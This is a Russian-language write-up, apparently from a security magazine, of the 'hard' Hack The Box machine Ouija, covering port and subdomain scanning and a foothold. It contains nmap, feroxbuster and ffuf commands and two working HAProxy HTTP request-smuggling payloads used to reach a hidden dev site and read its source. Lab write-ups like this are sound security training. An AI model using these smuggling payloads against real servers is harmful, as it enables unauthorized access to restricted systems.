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Наша цель — получение прав суперпользователя на машине Ouija с учебной площадки Hack The Box. Уровень ее сложности — «сложный».
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.244 ouija.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Сканер нашел три открытых порта:
- 22 — служба OpenSSH 8.9p1;
- 80 — веб‑сервер Apache 2.4.52;
- 3000 — приложение Node.js.
На начальном этапе нам доступно два веб‑приложения.
Точка входа
При просмотре истории запросов в Burp History можно увидеть запрос к домену
gitea..
Добавляем новый домен в
/ и просматриваем доступные неавторизованному пользователю репозитории.
10.10.11.244 ouija.htb gitea.ouija.htb
Доступен только один репозиторий, описание которого раскрывает некоторые используемые технологии. Отдельно отмечаем прокси‑сервер Haproxy.
Так как ничего интересного в самом репозитории найти не удалось, приступим к сканированию.
Справка: сканирование веба c feroxbuster
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов с целью поиска скрытой информации и недоступной обычным посетителям функций. Для этого можно использовать программы вроде dirsearch, dirb или ffuf. Я предпочитаю feroxbuster.
При запуске используем следующие параметры:
-
-u— URL;
-
-w— словарь (я использую словари из набора Seclists);
-
-t— количество потоков;
-
-d— глубина сканирования.
Задаем нужные параметры и запускаем сканер:
feroxbuster -u http://ouija.htb/ -t 128 -d 1 -w files_interesting.txt
Страница
server-status содержит логи запросов. По логам снова делаем вывод о проксировании на порт 8080.
Аналогично сканируем и каталоги на порте 3000, где работает API NodeJS.
feroxbuster -u http://ouija.htb:3000/ -t 128 -d 1 -w directory_2.3_medium_lowercase.txt
Найденный страницы сообщают либо об ошибке, либо о том, что нужны дополнительные заголовки HTTP.
То, что мы нашли новый поддомен, указывает на то, что их может быть и больше двух. Так что давай расчехлим сканер fuff и запустим со следующими параметрами:
-
-u— URL;
-
-w— словарь;
-
-t— количество потоков;
-
-H— HTTP-заголовок;
-
-fs— фильтр по размеру ответа.
ffuf -u "http://ouija.htb" -H 'Host: FUZZ.ouija.htb' -t 128 -w subdomains-top1million-110000.txt -fs 10671
Все поддомены, содержащие подстроку
dev, возвращают код 403. Это наводит на мысль о том, что используется фильтр.
Точка опоры
Haproxy — HTTP Request Smuggling
Мы знаем о том, что используется Haproxy, а это значит, что для него можно поискать готовые эксплоиты. Проще всего это делать в Google.
В первом найденном репозитории находим PoC.
Выполняем подобный запрос, но в качестве целевого адреса указываем сайт на домене
dev.
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 38
GET http://dev.ouija.htb/ HTTP/1.1
h:GET / HTTP/1.1
Host: ouija.htb
И в ответе получаем две страницы сразу:
ouija. и
dev.. На второй — два файла. Загружаем их запросами вроде следующего:
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 60
GET http://dev.ouija.htb/editor.php?file=app.js HTTP/1.1
h:GET / HTTP/1.1
Host: ouija.htb
Файл
app. — это исходный код приложения, которое работает на порте 3000. API
/ представляет интерес (строки 58-76), хотя и содержит фильтр, который должен предотвратить локальное включение файлов (LFI). Наша главная проблема — в аутентификации, которую нужно пройти, не зная учетные данные.
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